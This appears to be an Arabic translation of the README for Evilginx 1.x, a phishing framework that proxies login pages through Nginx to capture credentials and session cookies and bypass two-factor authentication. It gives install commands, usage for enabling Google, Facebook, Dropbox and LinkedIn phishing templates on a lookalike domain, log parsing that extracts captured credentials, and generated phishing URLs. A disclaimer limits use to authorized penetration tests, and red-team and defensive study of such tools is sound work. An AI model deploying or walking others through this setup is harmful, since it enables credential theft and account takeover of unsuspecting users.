
يرجى استخدام الإصدار الجديد: https://github.com/kgretzky/evilginx2

هذا الإصدار قديم. يُرجى استخدام أحدث إصدار!
EVILGINX 2: https://github.com/kgretzky/evilginx2
إيفيلجينكس هو إطار عمل هجوم وسيط (man-in-the-middle) يُستخدم لاصطياد بيانات الاعتماد وملفات تعريف الارتباط للجلسات لأي خدمة ويب. يعمل جوهره على خادم Nginx HTTP، الذي يستخدم proxy_pass وsub_filter لتوكيل وتعديل محتوى HTTP، مع اعتراض حركة المرور بين العميل والخادم.
يمكنك معرفة كيفية عمله وكيفية تثبيت كل شيء بنفسك على مدونتي:
المقال الأول قديم بعض الشيء الآن: إيفيلجينكس - التصيد المتقدم مع تجاوز المصادقة الثنائية
تحديث Evilginx 1.0: تحديث Evilginx 1.0 - ارفع مستوى لعبتك في التصيد عبر المصادقة الثنائية
تحديث Evilginx 1.1: تحديث Evilginx 1.1
أنا مدرك أن Evilginx يمكن استخدامه لأغراض شريرة جدًا. هذا العمل هو مجرد عرض لما يمكن للمهاجمين المهرة فعله. من مسؤولية المدافع أن يأخذ مثل هذه الهجمات في الاعتبار، عند إعداد الدفاعات، وإيجاد طرق للحماية من طريقة التصيد هذه. يجب استخدام Evilginx فقط في مهام اختبار الاختراق المشروعة بإذن كتابي من الأطراف المستهدفة بالتصيد.
يوفر Evilginx سكريبت تثبيت باسم install.sh يتولى تثبيت الحزمة بأكملها على أي جهاز يعمل بدبيان إصدار wheezy/jessie، بطريقة تشغيل ونسيان.
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
تمكين أو تعطيل تكوينات المواقع لاستخدامها مع خادم Nginx، باستخدام قوالب Evilginx المقدمة من مجلد sites.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Your phishing domain.
-y Answer all questions with 'Yes'.
-l, --list List available supported apps.
--enable ENABLE Enable following site by name.
--disable DISABLE Disable following site by name.
سرد قوالب تكوين المواقع المتاحة:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
تمكين موقع التصيد الخاص بجوجل باستخدام نطاق تصيد مسجل مسبقًا not-really-google.com:
python evilginx.py setup --enable google -d not-really-google.com
تعطيل موقع التصيد الخاص بفيسبوك:
python evilginx.py setup --disable facebook
تحليل سجلات Nginx لاستخراج بيانات اعتماد تسجيل الدخول وملفات تعريف الارتباط للجلسات المعترضة. بشكل افتراضي، تُحفظ السجلات في مجلد logs، حيث يوجد سكريبت evilginx.py. يمكن القيام بذلك تلقائيًا بعد تمكين التحليل التلقائي في مرحلة الإعداد.
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
for all sites).
--debug Does not truncate log file after parsing.
تحليل السجلات لموقع جوجل فقط:
python evilginx.py parse -s google
تحليل السجلات لجميع المواقع المتاحة:
python evilginx.py parse -s all
إنشاء عناوين URL للتصيد يمكنك استخدامها في تقييمات فريقك الأحمر.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to generate link for.
-r REDIRECT, --redirect REDIRECT
Redirect user to this URL after successful sign-in.
إنشاء عنوان URL لتصيد جوجل يعيد توجيه الضحية إلى فيديو rick'roll عند تسجيل الدخول بنجاح:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ